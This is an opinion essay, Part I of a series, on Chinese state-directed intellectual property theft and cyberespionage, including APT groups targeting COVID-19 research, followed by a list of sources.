by Stephen H. Campbell
This is Part I of a two-part series on China. Part I focuses on espionage.
US and UK intelligence agencies recently warned healthcare organizations about nation-state efforts to steal intellectual property related to research on vaccines and treatments for the SARS-CoV-2 virus. Multiple countries are engaged in this espionage. Why? Beyond the scientific research and knowledge needed to mitigate the existential risks associated with the pandemic, it is evident that whoever comes up with a vaccine first and is able to manufacture it in mass quantities stands to make huge financial and reputational gains. In terms of capability and intent to execute such an espionage campaign, one nation-state is conspicuous: the very nation-state where the virus originated.
China has the largest coordinated program of intellectual property (IP) theft in the world. Since the 1980s, appropriation of Western technology has been at the heart of the Chinese Communist Party’s (CCP’s) strategy for economic growth. Reflecting on its 5,000-year history, the relatively recent demise of the Qing Dynasty and the so-called “Century of Humiliation” at the hands of European colonial powers, the Chinese nation is patiently working towards restoring what it sees as its rightful place in the world. Like the British and the Americans before them, the Chinese realize that economic strength is the key to global power and the “Rejuvenation of the Chinese Nation”. It is also the key to feeding its population of over 1.3 billion, lifting another 400 million of its citizens out of poverty, and meeting the expectations of the 20 million workers coming into the jobs market each year.
China has demonstrated remarkable economic growth in recent years. Starting with Deng Xiaoping’s Open-Door Policy in the 1970s, encouraged by overtures from President Nixon that led to full diplomatic relations in 1979, and emboldened by acceptance into the World Trade Organization in 2001, China surpassed the US as the world’s largest trading nation in 2013. Its system of state-led capitalism exploits the international trading system to its fullest. China does not play by the rules of the US-led international order established by the US after World War II. In fact, the Chinese Communists see neoliberalism, constitutional democracy and universal rights as anathema to their own values. The Party would as soon replace this US-led order with one crafted after its own image. But it knows its time has not yet come. So, it plays along.
Luring Western multinationals onto its own turf with the prospect of the world’s largest consumer market, China plays hardball, demanding that these companies transfer their technology and knowhow to promote the indigenous innovation of Chinese companies. Attracting foreign talent from abroad into its so-called talent programs, China brings in leading edge researchers to stimulate its own R&D base. There are 90 nonprofit organizations in the US alone affiliated with the Chinese Communist Party, whose task it is to spot and assess US technical personnel and bring them into China’s technology transfer apparatus.
Armed with this acquired technology and knowledge, China then promotes its own “National Champions” through generous state subsidies, bank lines of credit and tax breaks, so that they not only bootstrap a domestic market, but also enter the global market, to compete against the very Western companies from whom they acquired the technology and knowhow in the first place. Communist Party “cells” and party-appointed board members ensure alignment with CCP strategy.
To accelerate this process, China has built up an unparalleled system of industrial and economic espionage, or what China refers to as “collection by other means” in its Science and Technology planning. Its principal target is the US. Since the early 2000’s, 80% of economic espionage cases in the US have been perpetrated by actors under the control of the Chinese government, and 60% of trade theft cases have ties to China. China’s success in rapidly acquiring the Intellectual Property that hard-working Americans have created over years of research and development is due to long-term planning, extensive grant-funded research, such as the 863 National High Technology R&D Program, and a huge network of émigrés.
Commercial espionage is largely the domain of China’s civil intelligence agency, the Ministry of State Security, while military espionage falls under the purview of the People’s Liberation Army. Still, many of China’s spies are not actually full-time assets, but rather naturalized US citizens of PRC origin who engage in “aggressive elicitation” through their professions or studies. Indeed, their actions may not rise to the level of criminality defined under US Code 1831 (economic espionage) or 1832 (theft of trade secrets), but are, nonetheless, injurious to the US economy or the US national interest.
While some willingly risk their careers for their home country, others are coerced through threats to their families back home. Another group of spies are the employees of Chinese companies stationed in the US, such as Huawei. These companies are mandated to assist the Chinese intelligence agencies. According to China’s National Intelligence Law, “any organization or citizen shall, in accordance with the law, support, provide assistance, and cooperate in national intelligence work, and guard the secrecy of any national intelligence work they are aware of.”
Human assets, of course, carry considerable risk of embarrassment for Beijing if they are caught. By contrast, cyberespionage offers plausible deniability and minimal risk. The “take” can also be considerable, as the Chinese attacks on Anthem, OPM, Marriott, and Equifax illustrate. Since Mandiant (now FireEye) outed PLA-affiliated Advanced Persistent Threat APT1 (“Comment Crew”) in 2013, it has catalogued at least 25 Chinese APT groups. To try and curb this activity, and with Mandiant’s help, President Obama negotiated an agreement with President Xi Jinping in December 2015, in which both parties agreed to refrain from commercially motivated espionage. Predictably, while the volume of detected Chinese cyberespionage attacks against the US dropped in the following year, the thieving continued, as attacks became more targeted and Chinese actors improved their techniques of obfuscation, denial and deception. President Trump took a different tack and deserves credit for calling the Chinese out publicly on their predatory trade practices and wholesale theft of American intellectual property.
To evade detection and make attribution difficult, many of the Chinese APT groups have now switched to using open source tools or “Living Off the Land” (taking advantage of legitimate administration tools within the target environment once they hack in). Attack volumes have also returned to pre-agreement levels. In the past two years some of these groups, such as APT10 (“Stone Panda” or “MenuPass”) and APT17 (“Aurora Panda” or “PIGFISH”), have achieved significant economies of scale through supply chain attacks, often directed at Managed Service Providers (MSPs) or Telecommunication Companies (TELCOs), through which they can reach a broad swathe of government and commercial targets.
Since the pandemic began, similar tactics have been deployed by APT41 (“Wicked Panda” or “Winnti Group”), in combination with the targeting of remote access technologies such as Citrix. While several other Chinese APT groups are known to target the healthcare, pharmaceutical, or biotechnology sectors, such as Mustang Panda, Emissary Panda, Judgement Panda, Pirate Panda, and Electric Panda, APT41 has been the most active espionage group during the pandemic. Unusually for Chinese government sponsored groups, APT41 also engages in financially motivated cyberattacks.
So, what are the chances that China is going to let up on its thievery against US hospitals, pharmaceutical laboratories, and research institutes? Don’t hold your breath. The need to vaccinate 1.3 billion people, the opportunity to be first to market and to demonstrate Chinese international leadership, and the chance to redeem itself for unleashing SARS-CoV-2 on the world, will continue to drive Chinese espionage against the US healthcare sector. Moreover, travel restrictions brought about by the pandemic are creating constraints on China’s non-traditional human collection and on talent program travel. And some multinationals have started to reconfigure their supply chains away from China to other geographies, to avoid a repeat of the business interruptions caused by the pandemic.
All these factors put more pressure on cyberespionage to deliver on the technology transfer promises for biotechnology and biopharmaceuticals made by the CCP in 2015 as part of its strategic 10-year “Made in China 2025” program. Given the self-inflicted economic recession created by the pandemic, the Communists may revise their targets for their next 5-year plan downwards. The plan is due in 2021. We’ll see. In the meantime, don’t count on Chinese espionage letting up any time soon.
In the second part of our series on China, we will explore Chinese influence operations and how they are tied to Chinese espionage. Stay tuned.
US Cert, APT Groups Target Healthcare and Essential Services, May 5, 2020, at https://www.us-cert.gov/ncas/alerts/AA20126A.
FBI, People’s Republic of China (PRC) Targeting of COVID-19 Research Organizations, May 13, 2020, at https://www.fbi.gov/news/pressrel/press-releases/peoples-republic-of-china-prc-targeting-of-covid-19-research-organizations.
Jonathan D.T. Ward, China’s Vision of Victory, Atlas Publishing and Media Company, 2019.
James Mulvenon, Beyond Espionage: IP Theft, Talent Programs, and Cyber Conflict with China, Webinar, Harvard Fairbank Center for Chinese Studies, April 22, 2020. Transcript at https://fairbank.fas.harvard.edu/wp-content/uploads/2020/01/Beyond-Espionage-IP-Theft-Talent-Programs-and-Cyber-Conflict-with-China-with-James-Mulvenon.pdf.
Nigel Inkster, “China in Cyberspace”, in Derek S. Reveron (Ed.), Cyberspace and National Security, Georgetown University Press, 2012.
Amy Chang, Warring State. China’s Cybersecurity Strategy, Center for a New American Security, December 2014, at https://www.jstor.org/stable/resrep06327?seq=1#metadata_info_tab_contents.
Bryan Krekel, Patton Adams, and George Bakos, Occupying the Information High Ground: Chinese Capabilities for Computer Network Operations and Cyber Espionage, US-China Economic and Security Review Commission, 2012, at https://nsarchive2.gwu.edu/NSAEBB/NSAEBB424/docs/Cyber-066.pdf.
Paul D. Moore, “How China Plays the Ethnic Card”, The Los Angeles Times, June 24, 1999, at https://www.latimes.com/archives/la-xpm-1999-jun-24-me-49832-story.html.
Alex Newman, “China’s Growing Spy Threat”, The Diplomat, September 19, 2011, at https://thediplomat.com/2011/09/chinas-growing-spy-threat.
Peter Mattis, “Assessing the Foreign Policy Influence of the Ministry of State Security”, China Brief, 11:1, Jamestown Foundation, January 14, 2011, at https://jamestown.org/program/assessing-the-foreign-policy-influence-of-the-ministry-of-state-security.
Bill Gertz, “Chinese Spy Who Defected Tells All”, The Washington Times, March 19, 2009, at https://www.washingtontimes.com/news/2009/mar/19/exclusive-chinese-spy-who-defected-tells-all.
Paul D. Moore, “Spies of a Different Stripe”, The Washington Post, May 31, 1999, at https://www.washingtonpost.com/archive/opinions/1999/05/31/spies-of-a-different-stripe/f547a3e2-60af-4979-bac7-3a31ec09729a.
Christopher Glyer, Dan Perez, Sarah Jones, Steve Miller, “This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits”, March 25, 2020, FireEye Threat Research, at https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html.
FireEye, M-Trends 2020, March 2020, at https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html.
CrowdStrike, Global Threat Report, 2020, at https://www.crowdstrike.com/resources/reports/2020-crowdstrike-global-threat-report.
CrowdStrike, Global Threat Report, 2019, at https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/.
Netasha Bertrand, “China-linked Electric Panda hackers seek US targets, intel agency warns”, Politico, April 15, 2020, at https://www.politico.com/news/2020/04/16/china-electric-panda-hackers-seek-us-targets-191220.
Florian Roth, APT Groups and Operations, at https://docs.google.com/spreadsheets/d/e/2PACX-1vTheajUWzRhTK0XhSI3_RnYVtUJvl8mlX8HlThPyCJGK1g5SBecgS78O1oeTFQxDYS0oWlKTg2pNLyb/pubhtml#.
ODNI, NCSC launches National Supply Chain Integrity Month in April, April 1, 2019, at https://www.dni.gov/index.php/ncsc-newsroom/item/1971-ncsc-launches-national-supply-chain-integrity-month-in-april#:~:text=The%20National%20Counterintelligence%20and%20Security%20Center%20(NCSC)%20today%20launched%20National,to%20help%20mitigate%20these%20risks.
Accenture, Cyber Threatscape Report 2018, August 2018, at https://www.accenture.com/_acnmedia/pdf-83/accenture-cyber-threatscape-report-2018.pdf.